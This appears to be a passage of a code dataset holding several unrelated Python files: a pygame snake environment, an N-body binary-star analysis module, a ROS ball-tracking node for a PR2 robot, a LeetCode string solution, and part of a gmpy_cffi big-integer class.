[self.wall_size, self.wall_size, self.width, self.length])\n\t\tvalue = self.score_font.render(\"Your Score: \" + str(self.score), True, HEAD_YELLOW)\n\t\tself.screen.blit(value, [7, 7])\n\t\tpygame.draw.rect(self.screen, GREEN, [self.foodx, self.foody, self.snake_size, self.snake_size])\n\t\t# display_snake(self.screen, MY_YELLOW, self.snake_size, self.snake_list)\n\t\tdisplay_snake(self.screen, HEAD_YELLOW, BODY_YELLOW, self.snake_size, self.snake_list)\n\t\tpygame.display.update()\n\t\tself.env_clock.tick(10)\n","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"550144699","text":"# read snapshot and obtain multiple systems\nimport collections\nfrom scipy import spatial as sp\nfrom .base import *\n\nclass SimpleParticle(DictNpArrayMix):\n \"\"\" Simple particle class with only mass, postion, velocity and r2\n \"\"\"\n def __init__(self, _dat=None, _offset=int(0), _append=False, **kwargs):\n keys = [['mass',1], ['pos',3], ['vel',3]]\n DictNpArrayMix.__init__(self, keys, _dat, _offset, _append, **kwargs)\n\n def calcR2(self):\n \"\"\" calculate distance square\n \"\"\"\n if (not 'r2' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['r2',1])\n self.r2 = vecDot(self.pos,self.pos)\n\n def calcEkin(self):\n \"\"\" calculate kinetic energy\n \"\"\"\n if (not 'ekin' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['ekin',1])\n self.ekin = 0.5*vecDot(self.vel,self.vel)*self.mass\n\n def correctCenter(self, cm_pos, cm_vel):\n self.pos -= cm_pos\n self.vel -= cm_vel\n\nclass Particle(SimpleParticle):\n \"\"\" Particle class \n \"\"\"\n def __init__ (self, _dat=None, _offset=int(0), _append=False, **kwargs):\n keys_se = [['radius',1],['dm',1],['time_record',1],['time_interrupt',1],['binary_state',1]]\n keys_bse = [['s_type',1],['s_mass0',1],['s_mass',1],['s_rad',1],['s_mcore',1],['s_rcore',1],['s_spin',1],['s_epoch',1],['s_time',1],['s_lum',1]]\n keys_std = [['r_search',1], ['id',1], ['mass_bk',1], ['status',1], ['r_in',1], ['r_out',1], ['acc_soft',3], ['pot',1], ['pot_soft',1], ['n_nb',1]]\n keys=keys_std\n if ('interrupt_mode' in kwargs.keys()):\n if (kwargs['interrupt_mode']=='base'):\n keys = keys_se+keys_std\n elif (kwargs['interrupt_mode']=='bse'):\n keys = keys_se+keys_bse+keys_std\n \n SimpleParticle.__init__(self, _dat, _offset, _append, **kwargs)\n DictNpArrayMix.__init__(self, keys, _dat, _offset+self.ncols, True, **kwargs)\n\n def calcEtot(self):\n if (not 'etot' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['etot',1])\n self.etot = self.ekin + self.mass*self.pot\n\ndef calculateParticleCMDict(pcm, _p1, _p2):\n \"\"\" calculate cm of particle pair\"\"\"\n if (issubclass(type(_p1), SimpleParticle)) & (issubclass(type(_p2),SimpleParticle)):\n pcm['mass'] = _p1.mass + _p2.mass\n pcm['pos'] = np.array(list(map(lambda m1,x1,m2,x2:(m1*x1+m2*x2)/(m1+m2), _p1.mass, _p1.pos, _p2.mass, _p2.pos)))\n pcm['vel'] = np.array(list(map(lambda m1,x1,m2,x2:(m1*x1+m2*x2)/(m1+m2), _p1.mass, _p1.vel, _p2.mass, _p2.vel)))\n elif (isinstance(_p1, collections.OrderedDict)) & (isinstance(_p2,collections.OrderedDict)) | (isinstance(_p1, dict)) & (isinstance(_p2, dict)):\n pcm['mass'] = _p1['mass'] + _p2['mass']\n pcm['pos'] = np.array(list(map(lambda m1,x1,m2,x2:(m1*x1+m2*x2)/(m1+m2), _p1['mass'], _p1['pos'], _p2['mass'], _p2['pos'])))\n pcm['vel'] = np.array(list(map(lambda m1,x1,m2,x2:(m1*x1+m2*x2)/(m1+m2), _p1['mass'], _p1['vel'], _p2['mass'], _p2['vel'])))\n else:\n raise ValueError('Initial fail, date type should be Particle or collections.OrderDict, given',type(_p1))\n\nclass Binary(DictNpArrayMix):\n \"\"\" Binary class\n \"\"\"\n def __init__ (self, _p1=None, _p2=None, _offset=int(0), _append=False, **kwargs):\n \"\"\"\n simple_mode: only calculate semi and ecc\n \"\"\"\n G=1\n simple_mode=True\n member_particle_type=SimpleParticle\n \n if 'G' in kwargs.keys(): G=kwargs['G']\n if 'simple_mode' in kwargs.keys(): simple_mode=kwargs['simple_mode']\n if 'member_particle_type' in kwargs.keys(): member_particle_type=kwargs['member_particle_type']\n\n if (issubclass(type(_p1), SimpleParticle)) & (issubclass(type(_p2),SimpleParticle)):\n member_particle_type = type(_p1)\n if (simple_mode): \n self.keys = [['mass',1],['pos',3],['vel',3],['rrel',1],['semi',1],['ecc',1],['p1',member_particle_type], ['p2', member_particle_type]]\n self.particleToSemiEcc(_p1, _p2, G)\n self.ncols= int(10)\n else:\n self.keys = [['mass',1],['pos',3],['vel',3],['m1',1],['m2',1],['rrel',1],['semi',1],['am',3],['L',3],['eccvec',3],['incline',1],['rot_horizon',1],['ecc',1],['rot_self',1],['ecca',1],['period',1],['t_peri',1],['p1', member_particle_type],['p2', member_particle_type]]\n self.particleToBinary(_p1, _p2, G)\n self.ncols= int(27)\n self.p1 = _p1\n self.p2 = _p2\n self.size = _p1.size\n self.ncols += self.p1.ncols + self.p2.ncols\n elif (_p2==None):\n if (simple_mode):\n keys = [['mass',1],['pos',3],['vel',3],['rrel',1],['semi',1],['ecc',1],['p1',member_particle_type], ['p2', member_particle_type]]\n DictNpArrayMix.__init__(self, keys, _p1, _offset, _append, **kwargs)\n else:\n keys=[['mass',1],['pos',3],['vel',3],['m1',1],['m2',1],['rrel',1],['semi',1],['am',3],['L',3],['eccvec',3],['incline',1],['rot_horizon',1],['ecc',1],['rot_self',1],['ecca',1],['period',1],['t_peri',1],['p1', member_particle_type],['p2', member_particle_type]]\n DictNpArrayMix.__init__(self, keys, _p1, _offset, _append, **kwargs)\n else:\n raise ValueError('Initial fail, date type should be Particle (2), Binary (1) or no argument (0)')\n self.initargs = kwargs.copy()\n\n def calcEkin(self):\n \"\"\" calculate kinetic energy\n \"\"\"\n if (not 'ekin' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['ekin',1])\n self.ekin = 0.5*vecDot(self.vel,self.vel)*self.mass\n\n def calcEtot(self):\n if (not 'etot' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['etot',1])\n self.etot = self.ekin + self.mass*self.pot\n\n def calcR2(self, member_also=False):\n \"\"\" calculate distance square\n \"\"\"\n if (not 'r2' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['r2',1])\n self.r2 = vecDot(self.pos,self.pos)\n if (member_also):\n ncols = self.p1.ncols + self.p2.ncols\n self.p1.calcR2()\n self.p2.calcR2()\n ncols = self.p1.ncols + self.p2.ncols - ncols\n self.ncols += ncols\n\n def calcPot(self, G):\n pos_b1 = self.p1.pos\n pos_b2 = self.p2.pos\n m_b1 = self.p1.mass\n m_b2 = self.p2.mass\n dr = pos_b1-pos_b2\n dr2 = vecDot(dr,dr)\n invr = 1/np.sqrt(dr2)\n pot_b1 = self.p1.pot + G*m_b2*invr\n pot_b2 = self.p2.pot + G*m_b1*invr\n if (not 'pot' in self.__dict__.keys()): \n self.ncols += 1\n self.keys.append(['pot',1])\n self.pot = (m_b2*pot_b1 + m_b1*pot_b2)/self.mass\n \n def correctCenter(self, cm_pos, cm_vel):\n self.pos -= cm_pos\n self.vel -= cm_vel\n self.p1.correctCenter(cm_pos, cm_vel)\n self.p2.correctCenter(cm_pos, cm_vel)\n\n def particleToSemiEcc(self, _p1,_p2, _G):\n \"\"\"\n calculate binary semi-major axis and eccentricity from particle pairs\n _p1, _p2: data class\n _G: gravitational constant\n return: semi, ecc\n \"\"\"\n calculateParticleCMDict(self.__dict__, _p1, _p2)\n\n dr = (_p1.pos - _p2.pos)\n dv = (_p1.vel - _p2.vel)\n \n dr2 = (dr*dr).sum(axis=1)\n dv2 = (dv*dv).sum(axis=1)\n rvdot= (dr*dv).sum(axis=1)\n \n dr = np.sqrt(dr2)\n m = (_p1.mass+_p2.mass)\n semi = 1.0/(2.0/dr - dv2/(_G*m))\n\n dr_semi = 1.0 - dr/semi\n ecc = np.sqrt(dr_semi*dr_semi + rvdot*rvdot/(_G*m*semi))\n\n self.rrel = dr\n self.semi = semi\n self.ecc = ecc\n\n def particleToBinary(self, _p1, _p2, _G):\n \"\"\" \n Calculate binary orbit from particle pairs\n _p1, _p2: particle array of member 1 and 2\n _G: gravitaitonal constant\n return: binary dicto\n \"\"\"\n binary=self.__dict__\n \n def regular_sign(_a,_a_err):\n _a[(_a<0) & (_a>-_a_err)] *= -1\n \n f_err = 1e-2\n calculateParticleCMDict(binary, _p1, _p2)\n\n binary['m1'] = _p1.mass\n binary['m2'] = _p2.mass\n m_tot = binary['mass']\n Gm_tot = _G*m_tot\n \n dx = _p1.pos-_p2.pos\n dv = _p1.vel-_p2.vel\n dr2 = vecDot(dx,dx)\n dv2 = vecDot(dv,dv)\n rvdot= vecDot(dx,dv)\n dr = np.sqrt(dr2)\n binary['rrel'] = np.sqrt(dr2)\n \n inv_dr = 1.0 / binary['rrel']\n binary['semi'] = 1.0 / (2.0*inv_dr - dv2 / Gm_tot)\n binary['am'] = np.array(list(map(lambda x,y:np.cross(x,y),dx,dv)))\n dp = np.array(list(map(lambda m1,x1,m2,x2:m1*x1-m2*x2,_p1.mass,_p1.vel,_p2.mass,_p2.vel)))\n binary['L'] = np.array(list(map(lambda x,y:np.cross(x,y),dx,dp)))\n binary['eccvec'] = np.array(list(map(lambda v,am,gm,dx,dr:np.cross(v,am)/gm-dx/dr,dv,binary['am'],Gm_tot,dx,dr)))\n \n binary['incline'] = np.arctan2(np.sqrt(binary['am'][:,0]*binary['am'][:,0]+binary['am'][:,1]*binary['am'][:,1]),binary['am'][:,2])\n binary['rot_horizon'] = np.arctan2(binary['am'][:,0],-binary['am'][:,1])\n regular_sign(binary['am'][:,0],f_err)\n regular_sign(binary['am'][:,1],f_err)\n #binary['rot_horizon'][binary['rot_horizon']<0] += np.pi\n binary['rot_horizon'][binary['am'][:,1]==0.0]=0.0\n \n cosOMG = np.cos(binary['rot_horizon'])\n sinOMG = np.sin(binary['rot_horizon'])\n cosinc = np.cos(binary['incline'])\n sininc = np.sin(binary['incline'])\n \n pos_bar_x = dx[:,0]*cosOMG + dx[:,1]*sinOMG\n pos_bar_y = (-dx[:,0]*sinOMG + dx[:,1]*cosOMG)*cosinc + dx[:,2]*sininc\n pos_bar_z = 0.0\n vel_bar_x = dv[:,0]*cosOMG + dv[:,1]*sinOMG\n vel_bar_y = (-dv[:,0]*sinOMG + dv[:,1]*cosOMG)*cosinc + dv[:,2]*sininc\n vel_bar_z = 0.0\n \n h = np.array(list(map(lambda x:np.sqrt(np.inner(x,x)),binary['am'])))\n ecccosomg = h/Gm_tot*vel_bar_y - pos_bar_x*inv_dr\n eccsinomg = -h/Gm_tot*vel_bar_x - pos_bar_y*inv_dr\n binary['ecc'] = np.sqrt( ecccosomg*ecccosomg + eccsinomg*eccsinomg )\n regular_sign(ecccosomg,f_err)\n regular_sign(eccsinomg,f_err)\n binary['rot_self'] = np.arctan2(eccsinomg,ecccosomg)\n #binary['rot_self'][binary['rot_self']<-np.pi+1e-5] += 2*np.pi \n #binary['rot_self'][binary['rot_self']>=np.pi-1e-5] -= 2*np.pi\n \n regular_sign(pos_bar_y,f_err)\n regular_sign(pos_bar_x,f_err)\n phi = np.arctan2(pos_bar_y, pos_bar_x)\n #phi[phi<-np.pi+1e-5] += 2*np.pi\n #phi[phi>=np.pi-1e-5] -= 2*np.pi\n \n f = phi - binary['rot_self']\n binary['ecca'] = np.arctan(np.sin(f)*np.sqrt(np.abs(binary['ecc']*binary['ecc'] - 1.0))/(binary['ecc']+np.cos(f)))\n n = np.sqrt(Gm_tot/np.abs(binary['semi']*binary['semi']*binary['semi']))\n binary['period'] = 8.0*np.arctan(1.0)/n\n l = binary['ecca'] - binary['ecc']*np.sin(binary['ecca'])\n binary['t_peri'] = l / n\n\ndef findPair(_dat, _G, _rmax, use_kdtree=False, simple_binary=True):\n \"\"\"\n Find paris\n _dat: Particle type data \n _G: gravitational constant\n _rmax: maximum binary separation\n use_kdtree: use KDtree to find all binaries (slow); otherwise use information from PeTar, only hard binaries are detected (fast)\n simple_binary: only calculate semi and ecc (fast); otherwise calculating all binary parameters (slow)\n return: [KDtree], single, binary\n \"\"\"\n if (not issubclass(type(_dat), SimpleParticle)):\n raise ValueError(\"Data type wrong\",type(_dat),\" should be subclass of \", SimpleParticle)\n\n if (use_kdtree):\n # create KDTree\n #print('create KDTree')\n kdt=sp.cKDTree(_dat.pos)\n \n # find all close pairs\n #pairs=kdt.query_pairs(_rmax*AU2PC)\n \n # only check nearest index\n #pair_index=np.unique(np.transpose(np.array([np.array([x[0],x[1]]) for x in pairs])),axis=0)\n \n # find pair index and distance\n #print('Get index')\n r,index=kdt.query(_dat.pos,k=2)\n pair_index=np.transpose(np.unique(np.sort(index,axis=1),axis=0))\n #pair_index = np.transpose(index)\n\n #index = kdt.query_pairs(_rmax,output_type='ndarray')\n #pair_index = np.transpose(index)\n \n # two members\n p1 = _dat[pair_index[0]]\n p2 = _dat[pair_index[1]]\n \n # check orbits\n #print('Create binary')\n binary = Binary(p1, p2, G=_G)\n apo =binary.semi*(binary.ecc+1.0)\n \n bsel= ((binary.semi>0) & (apo<_rmax))\n binary = binary[bsel]\n \n single_mask = np.ones(_dat.size).astype(bool)\n single_mask[pair_index[0][bsel]]=False\n single_mask[pair_index[1][bsel]]=False\n single = _dat[single_mask]\n return kdt, single, binary\n else:\n idx = _dat.status.argsort()\n dat_sort = _dat[idx]\n status, index, inverse, counts = np.unique(dat_sort.status, return_index=True, return_inverse=True, return_counts=True)\n binary_i1 = index[counts==2]\n binary_i2 = binary_i1+1\n binary = Binary(dat_sort[binary_i1], dat_sort[binary_i2], _G)\n single = dat_sort[index[-1]:]\n\n return single, binary\n\n","sub_path":"tools/analysis/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":13539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"316595069","text":"#!/usr/bin/env python\n\nimport rospy\nimport cv2\nimport time\nfrom threading import Timer\nfrom pymongo import MongoClient\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom pr2_web_motion_control.msg import CatchFeedback\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy as np\n\n\nclass BallTracker:\n def __init__(self):\n self.node_name = 'ball_tracker'\n # tracking info\n self.autonomous = False\n self.start_tracking = False\n self.ball_center = None\n self.ball_center_initial = None\n self.ball_depth_value = None\n self.ball_depth_value_initial = None\n self.ball_in_air = False\n self.frame_to_catch = 4\n self.start_time = 0\n self.positions = []\n self.catch_timer = None\n\n self.catch_records = {}\n self.get_catch_records()\n\n self.bridge = CvBridge()\n self.kinect_image_pub = rospy.Publisher('pr2_kinect_image', Image, queue_size=1)\n self.catch_feedback_pub = rospy.Publisher('catch_feedback', CatchFeedback, queue_size=1)\n self.arms_motion_pub = rospy.Publisher('arms_motion_control', String, queue_size=1)\n\n rospy.Subscriber('input_rgb_image', Image, self.image_callback, queue_size=1)\n rospy.Subscriber('input_depth_image', Image, self.depth_callback, queue_size=1)\n rospy.Subscriber('web_command', String, self.web_command_callback, queue_size=1)\n\n rospy.init_node(self.node_name)\n\n def reinitialize(self):\n self.autonomous = False\n self.start_tracking = False\n self.ball_center = None\n self.ball_center_initial = None\n self.ball_depth_value = None\n self.ball_depth_value_initial = None\n self.ball_in_air = False\n self.frame_to_catch = 4\n self.start_time = 0\n self.positions = []\n self.catch_timer = None\n\n def get_catch_records(self, msg=None):\n if msg is not None and msg.data == 'update records':\n self.catch_records = {}\n\n client = MongoClient('mongodb://52.64.47.249:80/pr2')\n db = client.get_default_database()\n for record in db.catchrecords.find():\n catch_range = int(record['initdepth'] / 100)\n if catch_range in self.catch_records.keys():\n self.catch_records[catch_range].append(record)\n else:\n self.catch_records[catch_range] = [record]\n\n rospy.loginfo('Catch records updated')\n\n def calculate_catch_time(self, initdepth):\n # default catch time for all ranges\n catch_time = 0.5\n\n catch_range = int(initdepth / 100)\n if catch_range in self.catch_records.keys():\n catch_time = 0\n records = self.catch_records[catch_range]\n for record in records:\n if record['result'] == 'too slow':\n catch_time += 0.9 * (initdepth / record['initdepth']) * record['time']\n elif record['result'] == 'too fast':\n catch_time += 1.1 * (initdepth / record['initdepth']) * record['time']\n elif record['result'] == 'succeed':\n catch_time += (initdepth / record['initdepth']) * record['time']\n\n catch_time /= len(records)\n\n return catch_time\n\n def image_callback(self, ros_image):\n # Use cv_bridge() to convert the ROS image to OpenCV format\n try:\n frame = self.bridge.imgmsg_to_cv2(ros_image, 'bgr8')\n except CvBridgeError as e:\n print(e)\n\n frame = np.array(frame, dtype=np.uint8)\n\n display_image = self.process_image(frame)\n\n self.kinect_image_pub.publish(self.bridge.cv2_to_imgmsg(display_image, 'bgr8'))\n\n def depth_callback(self, ros_image):\n try:\n depth_image = self.bridge.imgmsg_to_cv2(ros_image, 'passthrough')\n except CvBridgeError as e:\n print(e)\n\n depth_array = np.array(depth_image, dtype=np.float32)\n\n # Normalize the depth image to fall between 0 (black) and 1 (white)\n # cv2.normalize(depth_array, depth_array, 0, 1, cv2.NORM_MINMAX)\n\n if self.start_tracking and self.ball_center is not None:\n self.arms_motion_pub.publish('prepare catch')\n self.ball_depth_value = depth_array[int(self.ball_center[1]), int(self.ball_center[0])]\n\n if self.ball_depth_value_initial is None:\n self.ball_depth_value_initial = self.ball_depth_value\n rospy.loginfo('************************************************************')\n rospy.loginfo('Initial ball depth value: %s', self.ball_depth_value_initial)\n\n if self.ball_in_air and self.frame_to_catch > 0:\n self.frame_to_catch -= 1\n offset_x = self.ball_center[0] - self.ball_center_initial[0]\n offset_y = self.ball_center[1] - self.ball_center_initial[1]\n self.positions.append(offset_x)\n self.positions.append(offset_y)\n self.positions.append(self.ball_depth_value)\n rospy.loginfo('Current ball depth value: %s', self.ball_depth_value)\n rospy.loginfo('Current ball offset position: %s, %s', offset_x, offset_y)\n\n if not self.ball_in_air and self.ball_depth_value_initial - self.ball_depth_value > 500:\n self.ball_in_air = True\n self.ball_center_initial = self.ball_center\n self.start_time = time.time()\n rospy.loginfo('Time stamp when ball is in air: %s', self.start_time)\n rospy.loginfo('Depth value when ball is in air: %s', self.ball_depth_value)\n rospy.loginfo('Position when ball is in air: %s, %s', self.ball_center_initial[0],\n self.ball_center_initial[1])\n if self.autonomous:\n catch_time = self.calculate_catch_time(self.ball_depth_value_initial)\n self.catch_timer = Timer(catch_time, self.do_catch)\n self.catch_timer.start()\n rospy.loginfo('Plan to catch after %s', catch_time)\n\n def web_command_callback(self, msg):\n if msg.data == 'prepare catch':\n self.reinitialize()\n self.start_tracking = True\n elif msg.data == 'catch':\n self.do_catch()\n elif msg.data == 'prepare catch(autonomous)':\n self.reinitialize()\n self.autonomous = True\n self.start_tracking = True\n elif msg.data == 'stop control':\n self.reinitialize()\n rospy.loginfo('Control timeout')\n rospy.loginfo('------------------------------------------------------------')\n elif msg.data == 'update records':\n self.get_catch_records(msg)\n\n def do_catch(self):\n self.arms_motion_pub.publish('catch')\n catch_time = time.time()\n catch_feedback = CatchFeedback()\n catch_feedback.initdepth = self.ball_depth_value_initial\n catch_feedback.positions = self.positions[:]\n catch_feedback.time = catch_time - self.start_time\n rospy.loginfo('Time stamp when trying to catch: %s', catch_time)\n rospy.loginfo('Timing for catching: %s', catch_feedback.time)\n rospy.loginfo('------------------------------------------------------------')\n self.catch_feedback_pub.publish(catch_feedback)\n self.reinitialize()\n\n def process_image(self, frame):\n if self.start_tracking:\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n lower_red = np.array([156, 43, 46])\n upper_red = np.array([180, 255, 255])\n mask = cv2.inRange(hsv, lower_red, upper_red)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n contours, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n if len(contours) > 0:\n c = max(contours, key=cv2.contourArea)\n (x, y), radius = cv2.minEnclosingCircle(c)\n if radius > 10:\n self.ball_center = (x, y)\n cv2.circle(frame, (int(x), int(y)), int(radius), (255, 0, 0), 3)\n cv2.rectangle(frame, (int(x) - 5, int(y) - 5), (int(x) + 5, int(y) + 5), (255, 0, 0), -1)\n else:\n self.ball_center = None\n else:\n self.ball_center = None\n\n return frame\n\n\ndef main():\n BallTracker()\n rospy.spin()\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/ball_tracker.py","file_name":"ball_tracker.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"113378537","text":"# 编写一个函数来查找字符串数组中的最长公共前缀。\n# 如果不存在公共前缀,返回空字符串 \"\"。\nclass Solution:\n def longestCommonPrefix(self, strs):\n if not strs: return \"\"\n strr1 = min(strs)\n strr2 = max(strs)\n for i, s in enumerate(strr1):\n if s != strr2[i]:\n return strr2[:i]\n return strr1\n","sub_path":"LeetCodePython/No014.py","file_name":"No014.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"400462341","text":"import logging\nimport sys\n\nfrom gmpy_cffi.interface import gmp, ffi\nfrom gmpy_cffi.convert import _pyint_to_mpz, _pylong_to_mpz, _mpz_to_pylong, _mpz_to_str, MAX_UI\nfrom gmpy_cffi.cache import _new_mpz, _del_mpz\n\n\nif sys.version > '3':\n long = int\n xrange = range\n\n\nclass mpz(object):\n _mpz_str = None\n\n def __init__(self, n=0, base=None):\n \"\"\"\n mpz() -> mpz(0)\n\n If no argument is given, return mpz(0).\n\n mpz(n) -> mpz\n\n Return an 'mpz' object with a numeric value 'n' (truncating n\n to its integer part if it's a Fraction, 'mpq', Decimal, float\n or 'mpfr').\n\n mpz(s[, base=0]):\n\n Return an 'mpz' object from a string 's' made of digits in the\n given base. If base=0, binary, octal, or hex Python strings\n are recognized by leading 0b, 0o, or 0x characters, otherwise\n the string is assumed to be decimal. Values for base can range\n between 2 and 62.\n \"\"\"\n\n if isinstance(n, self.__class__):\n self._mpz = n._mpz\n return\n a = self._mpz = ffi.gc(_new_mpz(), _del_mpz)\n if isinstance(n, str):\n if base is None:\n base = 10\n if base == 0 or 2 <= base <= 62:\n if gmp.mpz_set_str(a, n.encode('UTF-8'), base) != 0:\n raise ValueError(\"Can't create mpz from %s with base %s\" % (n, base))\n else:\n raise ValueError('base must be 0 or 2..62, not %s' % base)\n elif base is not None:\n raise ValueError('Base only allowed for str, not for %s.' % type(n))\n elif isinstance(n, float):\n gmp.mpz_set_d(a, n)\n elif isinstance(n, (int, long)):\n _pyint_to_mpz(n, a)\n else:\n raise TypeError\n\n @classmethod\n def _from_c_mpz(cls, mpz):\n inst = object.__new__(cls)\n inst._mpz = ffi.gc(mpz, _del_mpz)\n return inst\n\n def __str__(self):\n if self._mpz_str is None:\n self._mpz_str = _mpz_to_str(self._mpz, 10)\n return self._mpz_str\n\n def __repr__(self):\n return 'mpz(%s)' % self\n\n def __hex__(self):\n tmp = '0x' + _mpz_to_str(abs(self)._mpz, 16)\n return tmp if self >= 0 else '-' + tmp\n\n def __oct__(self):\n tmp = '0' + _mpz_to_str(abs(self)._mpz, 8)\n return tmp if self >= 0 else '-' + tmp\n\n def __add__(self, other):\n if isinstance(other, (int, long)):\n res = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_add_ui(res, self._mpz, other)\n else:\n _pyint_to_mpz(other, res)\n gmp.mpz_add(res, self._mpz, res)\n return mpz._from_c_mpz(res)\n elif isinstance(other, mpz):\n res = _new_mpz()\n gmp.mpz_add(res, self._mpz, other._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n __radd__ = __add__\n\n def __sub__(self, other):\n if isinstance(other, (int, long)):\n res = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_sub_ui(res, self._mpz, other)\n else:\n _pylong_to_mpz(other, res)\n gmp.mpz_sub(res, self._mpz, res)\n return mpz._from_c_mpz(res)\n elif isinstance(other, mpz):\n res = _new_mpz()\n gmp.mpz_sub(res, self._mpz, other._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n def __rsub__(self, other):\n if isinstance(other, (int, long)):\n res = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_ui_sub(res, other, self._mpz)\n else:\n _pylong_to_mpz(other, res)\n gmp.mpz_sub(res, res, self._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n def __mul__(self, other):\n if isinstance(other, (int, long)):\n res = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_mul_ui(res, self._mpz, other)\n else:\n _pylong_to_mpz(other, res)\n gmp.mpz_mul(res, res, self._mpz)\n return mpz._from_c_mpz(res)\n elif isinstance(other, mpz):\n res = _new_mpz()\n gmp.mpz_mul(res, self._mpz, other._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __floordiv__(self, other):\n if isinstance(other, (int, long)):\n if other == 0:\n raise ZeroDivisionError('mpz division by zero')\n res = _new_mpz()\n if 0 < other <= MAX_UI:\n gmp.mpz_fdiv_q_ui(res, self._mpz, other)\n else:\n _pylong_to_mpz(other, res)\n gmp.mpz_fdiv_q(res, self._mpz, res)\n return mpz._from_c_mpz(res)\n elif isinstance(other, mpz):\n if other == 0:\n raise ZeroDivisionError('mpz division by zero')\n res = _new_mpz()\n gmp.mpz_fdiv_q(res, self._mpz, other._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n def __rfloordiv__(self, other):\n if isinstance(other, (int, long)):\n if self == 0:\n raise ZeroDivisionError('mpz division by zero')\n res = _new_mpz()\n _pylong_to_mpz(other, res)\n gmp.mpz_fdiv_q(res, res, self._mpz)\n return mpz._from_c_mpz(res)\n else:\n return NotImplemented\n\n __div__ = __floordiv__\n __rdiv__ = __rfloordiv__\n\n def __mod__(self, other):\n if isinstance(other, (int, long)):\n if other == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n r = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_fdiv_r_ui(r, self._mpz, other)\n else:\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n gmp.mpz_fdiv_r(r, self._mpz, oth)\n _del_mpz(oth)\n return mpz._from_c_mpz(r)\n elif isinstance(other, mpz):\n if other == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n r = _new_mpz()\n gmp.mpz_fdiv_r(r, self._mpz, other._mpz)\n return mpz._from_c_mpz(r)\n else:\n return NotImplemented\n\n def __rmod__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n if self == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n r = _new_mpz()\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n gmp.mpz_fdiv_r(r, oth, self._mpz)\n _del_mpz(oth)\n return mpz._from_c_mpz(r)\n\n def __divmod__(self, other):\n if isinstance(other, (int, long)):\n if other == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n q = _new_mpz()\n r = _new_mpz()\n if 0 <= other <= MAX_UI:\n gmp.mpz_fdiv_qr_ui(q, r, self._mpz, other)\n else:\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n gmp.mpz_fdiv_qr(q, r, self._mpz, oth)\n _del_mpz(oth)\n return mpz._from_c_mpz(q), mpz._from_c_mpz(r)\n elif isinstance(other, mpz):\n if other == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n q = _new_mpz()\n r = _new_mpz()\n gmp.mpz_fdiv_qr(q, r, self._mpz, other._mpz)\n return mpz._from_c_mpz(q), mpz._from_c_mpz(r)\n else:\n return NotImplemented\n\n def __rdivmod__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n if self == 0:\n raise ZeroDivisionError('mpz modulo by zero')\n q = _new_mpz()\n r = _new_mpz()\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n gmp.mpz_fdiv_qr(q, r, oth, self._mpz)\n _del_mpz(oth)\n return mpz._from_c_mpz(q), mpz._from_c_mpz(r)\n\n def __lshift__(self, other):\n if not isinstance(other, (int, long, mpz)):\n return NotImplemented\n oth = gmp.mpz_get_ui(other._mpz) if isinstance(other, mpz) else other\n res = _new_mpz()\n gmp.mpz_mul_2exp(res, self._mpz, oth)\n return mpz._from_c_mpz(res)\n\n def __rlshift__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n return mpz(other) << self\n\n def __rshift__(self, other):\n if not isinstance(other, (int, long, mpz)):\n return NotImplemented\n oth = gmp.mpz_get_ui(other._mpz) if isinstance(other, mpz) else other\n res = _new_mpz()\n gmp.mpz_fdiv_q_2exp(res, self._mpz, oth)\n return mpz._from_c_mpz(res)\n\n def __rrshift__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n return mpz(other) >> self\n\n def __hash__(self):\n # WTF When this returns -1, CPython silently changes it to -2\n i = int(self)\n if -sys.maxsize - 1 <= i <= sys.maxsize:\n return i\n return (i + sys.maxsize + 1) % (2 * sys.maxsize + 2) - sys.maxsize - 1\n\n def __cmp(self, other):\n if isinstance(other, mpz):\n res = gmp.mpz_cmp(self._mpz, other._mpz)\n elif isinstance(other, (int, long)):\n if 0 <= other <= MAX_UI:\n res = 